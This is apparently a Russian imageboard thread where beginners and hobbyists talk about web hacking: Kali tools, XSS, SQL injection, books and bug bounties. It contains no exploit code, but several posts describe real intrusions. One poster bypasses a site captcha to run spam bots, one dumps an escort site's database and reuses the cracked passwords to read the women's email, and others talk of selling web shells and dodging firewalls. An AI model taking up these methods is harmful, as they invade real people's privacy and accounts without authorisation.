>>144869013 (OP)>заливал шеллы>сливал базы>не смог написать спойлер без ошибок>бамплимитгг вп
>>144902896Так сказал бы, что дырявые, деньги-то при чем?
https://kali.tools/?p=1744Годно для новичка?
>>144902970Да пусть так остается, может кому-то на пользу будет или для тренировок по информатике, лол
>>144903037>Forbidden>You don't have permission to access / on this server.годно
>>144903037tools.kali.orgГодно.>>144903064Черт, хотел же ноут прихватить сегодня. щкольник тут
>>144903110Я про статью о песочницеWeb Security Dojo
>>144903449говно для скрипткидди, учат их мыслить однообразно.
>>144903449
>>144881537гугли XSSмне так вк 2к$ заплатили (но там мне повезло)мимокроккстати, всё нихуя не так просто как звучит и кажется
>>144903537Когда дорвеями занимался, оказывается XSS использовал, когда редиректил на партнёрки с профиля %). Когда-ж это было, пиздец-давно.
Я однажды нашёл способ отключить капчу на дваче. Абу взамен паскод предложил. И не согласился и решил побольше заработать. В торе покупать никто не захотел. Для того чтобы поиметь с этого профиты стал писать бота для спам рекламы. Клаудфлар блочил прокси. А вскоре абу прикрыл этот баг. Лучше бы взял пасскод.
>>144870376начни с web hacking 101потом на хабре был пост с книжками, гугли "книги по наступательной информационной безопасности" или чет такоетот же мимокрок>>144903663
>>144903749Ну расскажи в чем бага была, все равно закрыта уже.
1
>>144903771>web hacking 101>книга>2015Видимо тема знатно протухла, но интересная, сука.
ПИДОРЫ
>>144904168>2015>знатно протухлаТут до сих пор sql-inj и xss актуальны (а это минимум 2003г), а ему все мало.
>>144903803В captcha_id в первых 12 символов был спрятан ответ на капчу. Если второй символ 0, то первый символ в капче 7, если второй символ в id f то ответ первый символ в капче 8. Написал простой скрипт и сидела без капчи пол года.
>>144904506Прикольно. Это яндекса капча была или уже новая?
>>144904746Новая. После того как он вернул капчу пришлось вайпалку переписывать. Скачал случайно много капч, отсортировал по имени и заметил какую-то закономерность.
>>144904906Респект.
>>144904434ОП хоть в правильном направлении направил?
Надоело кодить говно всякое однотипное, так хоть тех базу подтяну заодно.
>>144905055Да.
>>144905127Хочешь тех базу подтянуть читай Кнута, а не это гавно от скрипткиддисов.
>>144905334Ты бы еще страус трупа посоветовал.
>>144905334Ну как минимум подборка книг "по наступательной информационной безопасности" которую анон посоветовал чёт не походит на крипткидди
>>144905394Точно, ерунду посоветовал. Читай маны по Xspider.
>>144887332>Не сливайте баги на хакерван.Почему? Куда их сливать?
>>144905394лол
>>144905480сюда в тредик.
>>144905557Двачую. Тут хоть интернетами и сотнями нефти платят за находки.
А чому все так не любят Кали?
>>144905828я люблю
>>144905828Поныне случаются прецеденты убийств современными тугами людей во имя Кали, подобные убийствам людей современными сектантами.
>>144905828Потому что куча устаревшего и ненужного говна весом больше 4 GB. В реальности нужны от силы 5-10 программ упрощающих поиск и использование уязвимостей, текстовый редактор и компилятор любимого языка. Все это спокойно ставится из терминала на любом дистрибутиве. Юзать кали - это из пушки по воробьям стрелять.
>>144906917>весом больше 4 GBТрех, конечно. Перепутал с другим.
test
>>144906917>компиляторконпелятор же
Ребята, продержите тред до вечера, понимаю, что осталось меньше 50 постов, но все же...
>>144907059В МЕСТЕ МЫ СИЛА!ВСТУПАЙ И КОНПЕЛИРУЙ!
>>144907059ВСТУПАЙ И КОМПЕЛИРУЙ! В МЕСТЕ МЫ СИЛА!
>>144908087>>144908100Лол, разум улья. БоХаЦэ - наше все, одепты. Заливайте шеллкодесы, конпелируйте 0дей, не будьте хуесосами.
>>144908193А чего сразу не БоХаФэ?
>>144908794Цэ.
>>144908034Держу.
>>144908034Да на архиваче уже есть.
>>144913070Там ощущения не те. Все равно что хакать через проксю.
В 24 не поздно вкатываться в эту хуйню?Немного шарю в программировании, специальность околоайтишная.
>>144913464Лучше после 12 вкатываться и до 5 утра примерно. Меньше шансов застать админа за чтением логов.
>>144913624Некоторые в режиме реального времени, без перерыва на сон, мониторят логи.
>>144913624Я про возраст, бро. Нет, я понимаю, что не поздно, если действительно заинтересоваться. На первых парах можно как к хобби относиться, занимаясь вечером после работы этим. Но блять, чот мне кажется, что не все так радужно как оп написал и первые бабки (хотя б от продажи шелов) получится получать не менее, чем через полгода-год.
>>144913867Вкатывайся, только на бабки не заморачивайся.Ломай в свое удовольствие сначала. Пройди все круги ада новых технологий, а потом только о деньгах думай.Алсо можно и на работе ломать, хули там, тыц-тыц - бага, скрипт запустил и пусть он расковыривает дальше.
>>144914988Так и буду делать, пожалуй.
>>144914917Лол. Я снова это сделал. На выходных буду без капчи сидеть.
>>144915243Ну ты крут, еще раз респект.
>>144915135Всегда пожалуйста.Обращайся, если что.
Посоны, а чому страница не алертит?Или хром для ХСС - моветон?
>>144916196да, хром блочитможно обойти
>>144873481Еще один дуст. Кек.
>>144916342>дустЭто сленг про багхантеров такой?
>>144916259и лиса так же себя ведёт хз, короче.Пойду ещё почитаю.
>>144916196Потому что хуета какая-то. Парсер не посчитал твой тэг за тэг, иначе бы цветом выделил.Некоторые хитрожопые парсеры например меняют в script с на русскую с.Задампи страницу и смотри.
тест
>>144869013 (OP)Тред в архив и реквестрию ссылку.
Аноны, а где можно будет вопросы по задавать? На тех же формах, что оп кидал? Есть какая-нибудь двачерская конфа? Я помню тут раньше раздел был с набегами и большим количество всяческих писатлей вирусов/брутфорсеров.
>>144917100есть конфа отдельных людей на пару человексоздай тред в каком то медленном разделе
>>144916782Это по ходу реакт рендерит страницу данными из инпута на лету.
>>144917100В воркаче безопасников тред есть.
>>144917342ссылку
>>144917376Он у меня почти всегда открытhttps://2ch.hk/wrk/res/723039.html
>>144917100>раньше раздел был с набегамиНе сыпь мне соль на рану...
>>144917548Золотые времена. Тогда еще была реальная возможность вкатиться в это все с помощью того же радмина. Эх.
>>144917664Забей на радмин. Это не правильный путь развития.
>>144918285Ну на дошик раньше точно можно было накопить, попутно развиваясь в правильном направлении. Это же все хакинг.
Как выключить XSS Auditor в хроме или в каком браузере его нет?
>>144918516Дались тебе эти копейки. Наоборот на хобби тратить нужно, пока не достигнешь того уровня, когда это начнет приносить доход.
>>144919202В фаерфоксе нет, или в старых операх.
>>144919276Ну это та, воспоминания были.Сейчас есть работа и хочу как хобби заняться багхантингом.
ОП, ты еще тут? Ответь, пожалуйста, с меткой ОПа, если здесь, будь добр.
>>144908794BHC. Bugger Hukker Crew. Если не знаешь, кто это, то ты многое проебал. (и да, таки это был зомба)
А я пока продолжу лазить по почтам проституток.Если вы вдруг, на какой-то момент, подумали что есть некие "индивидуалки" - то спешу вас расстроить.
>>144919929Что думаешь с этим всем делать?
>>144920001Соберу пак и дрочить буду.
>>144919929Как вскрываешь ящики?
>>144920047ТруЪ
>>144920060Слил БД с сайта проституток, сбрутил хэши, пробую пароли к мыльцам. Частенько пароли подходят.
>>144920255> Слил БД с сайтаНаучи, а? Мне действительно не для заработка (и не майор я, ёбана рот, даже не капитан и вообще обычнохуй), а рили хобби хочу такое. Я тот хуй, что выше писал, что раньше кряками пытался заниматься.
>>144919929Бля так вот кто на сарте выкладывает фото путан.
>>144920457>крякмиОхуенно же.Есть жаббер?
>>144873317>туповат >для программирования Проиграл с этого.
>>144920798Есть, но тут палить его не буду, вот фейкомыло crazy.petuh@yandex.ruТолько не подумай, что я шарю в реверсинге, я уже все забыл, это были нулевые, извращались как могли
>>144921169На сряклабе был, лол? Подтянешься, если что. Тут главное мозгами шевелить.Отпишу сейчас на почту.
>>144921367Был конечно! В те года, как не быть, и на васме был.
предпоследний бумп
https://docs.google.com/document/d/14cjCv29CAlTrUxXbRicysYPRKZjtTqCdOlPgR9JkwIg/edit?usp=sharingЗапили выжимку из ОП постов.
А где найти Web Hacking 101 на русском , а то не все понятно там
>>144923231Толсто.
>>144923770>не все понятно тамWeb - вебHacking - хакинг101 - основы
>>144924007Благодарю сударь , этого я и ждал
>>144923817что толстого, или думаешь я гуглоадреса диванонить собрался?
У кого то есть курсы pwk, wifu,ctp?Молю, нужны pdfки
>>144922795нахуй ты бамплимит бампаешь?
ребята, возьмите меня под свое крыло в сфере какинга, вроде что-то умею, а вроде и нет, изи нахожу уязвимости на средних проектах, но вот эксплуатировать не получается, или waf мешает хуй знает что, а подобрать годный buypass(libinjection) не получается, вот мое мыло: bose@rootfest.net напишите кто-нибудь, пообщаемся в жабе или в телеге, я не майор!!! ищу партнера без регистрации по смс(те кто работают по ру, не пиши пожалуйста, идите нахуй)@Кто работает по ру, к тому приходят по утру :C
>>144915243Были трудности с реализацией юзерскрипта. я не знаю js Решил продать за пасскод. Но даже тут абу смог наебать. Он прислал не самый лучший. Надеюсь на год, а не полгода.
>>144925123Я хакер.
>>144926442Нахуй ты бампашь? Бамплимит же
Бля, надеюсь ночью будет еще один тред.
>>144926519>Нахуй ты бампашь? Бамплимит жеон двач хакнул, невидеш чтоли
>>144926592От того же опа?
>>144926592Думаю пивца род такое дело взять.
>>144926690Тестишь генератор предложений из рандомных слов? Ты выбрал идеально подходящее место для тестов.
>>144926656Необязательно. Тут другие аноны тоже вкидывали годные вещи для новичков.
>>144926690>пивца родВурст
>>144926776Тогда можно самому перекат запилить
>>144926805Автозамена же.
>>144926815Ты хакер штоле?
>>144926815Меня нахуй пошлют, лол. Я же не знаю ничего и бампать нечем.
>>144926923Нет. Но мы же будем делать то же самое что и здесь. Ждать пока кто-то умный вкатится.
>>144927029А в этом есть смысл.
